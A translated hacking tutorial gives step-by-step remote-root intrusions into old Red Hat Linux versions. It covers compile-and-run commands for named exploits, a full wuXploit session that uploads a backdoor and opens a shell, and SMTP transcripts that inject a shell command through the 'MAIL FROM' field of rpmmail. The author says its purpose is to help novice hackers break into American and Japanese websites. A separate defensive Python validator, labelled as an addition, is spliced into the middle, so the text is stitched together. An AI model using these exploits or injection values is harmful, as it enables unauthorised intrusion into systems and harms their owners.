Several Known Methods of Intruding into Linux and NT (Tool Usage)

善心即天堂
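------------------------------- written by redcrack -------------------------------------
The purpose of this article is simply to tell everyone: there is no such thing as an absolutely secure website. Any site can be breached; it is only a matter of time!
This article was also written so that domestic hackers who are just starting out can better intrude into American and Japanese websites.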
-----------------------------------------------------------------------------------------
Red Hat 7.0 intrusion (remote root)
redcrack$gcc -o SEClpd seclpd.c
redcrack$./SEClpd victim brute -t type
redcrack$./SEClpd victim -t 0 (then try the brute)
redcrack$./SEClpd victim -t 1 (you can)
You can use: lpd-ex.c, rdc-lprng.c, ypbind.tgz
You can find them at go.163.com/~redcrack/EXPLOITS/OS/LINUX/REDHAT/7.0/index.html
Red Hat 6.2 intrusion (remote root)
redcrack$gcc -o statdx statdx.c
redcrack$statdx -d 0 victim
redcrack$statdx -d 1 victim(you can)
redcrack$gcc -o inndx inndx.c
redcrack$inndx [command [offset]]|nc -i 1 victim 119
Red Hat 6.1 intrusion (remote root)
redcrack$gcc -o statdx statdx.c
redcrack$statdx -d 0 victim
redcrack$statdx -d 1 victim(you can)
Another method: wuXploit.tgz, via wuftpd
[wildcoyote@userfriendly wuXploit]$ ls -l
total 13
-rw-r--r-- 1 wildcoyo wildcoyo 1473 Jun 27 18:22 backdoor.c <- evil BD
-rw-rw-r-- 1 wildcoyo wildcoyo 86 Jun 27 18:29 own.sh <- script
-rwxr-xr-x 1 wildcoyo wildcoyo 7037 Jun 27 19:29 readme.txt <- Thiz file
-rwxr-xr-x 1 wildcoyo wildcoyo 5661 Jun 27 19:28 wuXploit.c <- tha c0d3
[wildcoyote@userfriendly wuXploit]$
Upload the files
[wildcoyote@userfriendly wuXploit]$ ftp biatx
Connected to biatx.userfriendly.
220 biatx.userfriendly FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999) ready.
Name (biatx:wildcoyote): wildcoyote
331 Password required for wildcoyote.
Password:
230 User wildcoyote logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /tmp
250 CWD command successful.
ftp> put own.sh
local: own.sh remote: own.sh
200 PORT command successful.
150 Opening BINARY mode data connection for own.sh.
226 Transfer complete.
86 bytes sent in 0.0158 secs (5.3 Kbytes/sec)
ftp> put backdoor.c
local: backdoor.c remote: backdoor.c
200 PORT command successful.
150 Opening BINARY mode data connection for backdoor.c.
226 Transfer complete.
1473 bytes sent in 0.00749 secs (1.9e+02 Kbytes/sec)
ftp> quit
221-You have transferred 1559 bytes in 2 files.
221-Total traffic for this session was 2175 bytes in 2 transfers.
221-Thank you for using the FTP service on biatx.userfriendly.
221 Goodbye.
Compile
[wildcoyote@userfriendly wuXploit]$ cc wuXploit.c -o wuXploit
[wildcoyote@userfriendly wuXploit]$
[wildcoyote@userfriendly wuXploit]$ ./wuXploit
WuFtpd Remote/Local Exploit by [email protected]
Sintaxe: ./wuXploit [wuftp port] [backdoor port]
[wildcoyote@userfriendly wuXploit]$ ./wuXploit wildcoyote password /tmp biatx
WuFtpd Remote/Local Exploit by [email protected]
Trying to connect to biatx[21]...SUCCESSFULL
Sending username (wildcoyote)...DONE
Sending password (**********)...DONE
SYST...DONE
TYPE I...DONE
Changing dir to /tmp...DONE
Setting up'evil'code :[ ...DONE
Compiling/Running backdoor...DONE
Let's delete the EVIL'entry :[ ...DONE
Oh k! It's a WRAP :D
Checking if tha backdoor is up...
Connecting to biatx [5343]...SUCCESS
Tha backdoor is running! ;)
Dr@@ping you to tha own3d shell...
Start typing dewd ;)
id
uid=500(wildcoyote) gid=500(wildcoyote) groups=500(wildcoyote)
ls -l
total 19
-rwxr-xr-x 1 wildcoyo wildcoyo 13572 Jan 1 00:41 backdoor
-rw-r--r-- 1 wildcoyo wildcoyo 1215 Jan 1 00:41 backdoor.c
drwx------ 2 wildcoyo wildcoyo 1024 Jun 25 2000 orbit-wildcoyote
-rw-rw-r-- 1 wildcoyo wildcoyo 86 Jan 1 00:41 own.sh
exit
The connection was closed!
Exiting...
~~~~
Via qib
redcrack$gcc -o qib qib.c
redcrack$ ./qib
redcrack$ ./qib 10.0.0.50 10.0.0.69 lp0 poopmail.cf dffunkyscript
redcrack$ telnet 10.0.0.69 26092
Trying 10.0.0.69...
Connected to 10.0.0.69.
Escape character is '^]'.
bash$ cat /etc/issue
cat /etc/issue
Red Hat Linux release 6.0 (Hedwig)
Kernel 2.3.25 on an i686
bash$
bash$ id
id
uid=1(bin) gid=0(root) groups=0(root)
bash$
bash$
Red Hat 6.0 intrusion (remote root)
redcrack$gcc -o statdx statdx.c
redcrack$statdx -d 0 victim
redcrack$statdx -d 1 victim(you can)
Intrusion via amd
redcrack$amd-ex [offset]
Intrusion via pro
redcrack$ cc pro.c -o pro
redcrack$ pro 1.1.1.1 ftp.linuz.com /incoming
Intrusion via rpmmail
redcrack$ telnet (host) 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Sendmail 8.9.3 + RPMmail
redcrack$ telnet (host) 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999
helo x.x
250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased to meet you
MAIL FROM: ;/command/to/execute;@microsoft.com
250 <;/command/to/execute;@microsoft.com> ... Sender Okay
RCPT TO: rpmmail
250 ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
redcrack$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3
helo x.x
250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased to meet you
MAIL FROM: ;/command/to/execute;@microsoft.com
250 ;/command/to/execute;@microsoft.com... Sender ok
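In the rpmmail transcripts above, the server answers "Sender Okay" to an envelope sender that contains shell metacharacters. The following is an added defensive example, not part of the original article: a validator that a mail filter or log reviewer could run over client-side SMTP lines to reject such envelope addresses before they reach a delivery script. The function names, the allow-list pattern and the sample session are assumptions constructed for illustration.

```python
import re

# Shell-special characters; none belong in an envelope address that a
# delivery agent may later place on a command line.
SHELL_META = set(";|&`$(){}<>\\\"'*?!\n\r")
# Conservative allow-list (an assumption): local part with an optional domain.
SAFE_MAILBOX = re.compile(r"[A-Za-z0-9._+=-]{1,64}(@[A-Za-z0-9.-]{1,255})?")
VERB = re.compile(r"\s*(MAIL FROM|RCPT TO)\s*:\s*(.*?)\s*", re.IGNORECASE)
# <path> or bare path, then optional ESMTP parameters such as SIZE=1000.
PATH = re.compile(r"(?:<([^<>]*)>|([^\s<>]*))((?:\s+[A-Za-z0-9-]+(?:=[\w.+-]+)?)*)")


def check_envelope(line):
    """Classify one client line; None if it is not MAIL FROM / RCPT TO."""
    v = VERB.fullmatch(line)
    if v is None:
        return None
    verb, rest = v.group(1).upper(), v.group(2)
    p = PATH.fullmatch(rest)
    if p is None:
        return verb, rest, "malformed"  # junk after the path, nested brackets
    addr = p.group(1) if p.group(1) is not None else p.group(2)
    if p.group(1) == "" and verb == "MAIL FROM":
        return verb, addr, "ok"  # null reverse-path <> used for bounces
    if SAFE_MAILBOX.fullmatch(addr):
        return verb, addr, "ok"
    verdict = "shell-metachar" if SHELL_META & set(addr) else "malformed"
    return verb, addr, verdict


def flag_session(lines):
    """Return (line_no, verb, address, verdict) for each rejected envelope line."""
    checked = ((n, check_envelope(l)) for n, l in enumerate(lines, 1))
    return [(n, *r) for n, r in checked if r and r[2] != "ok"]


# Constructed session; lines 3 and 5 reuse the envelope values shown above.
SAMPLE = [
    "helo x.x",
    "MAIL FROM:<alice@example.org> SIZE=1000",
    "MAIL FROM: ;/command/to/execute;@microsoft.com",
    "250 <;/command/to/execute;@microsoft.com> ... Sender Okay",
    "RCPT TO: rpmmail",
    "MAIL FROM:<>",
    "rcpt to:<bob@example.org>;id",
]
```

Server replies such as the `250` line are ignored because only client commands are classified; `flag_session(SAMPLE)` reports lines 3 and 7.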
Red Hat 5.2 intrusion (remote root)
Intrusion via amd
redcrack$amd-ex [offset]
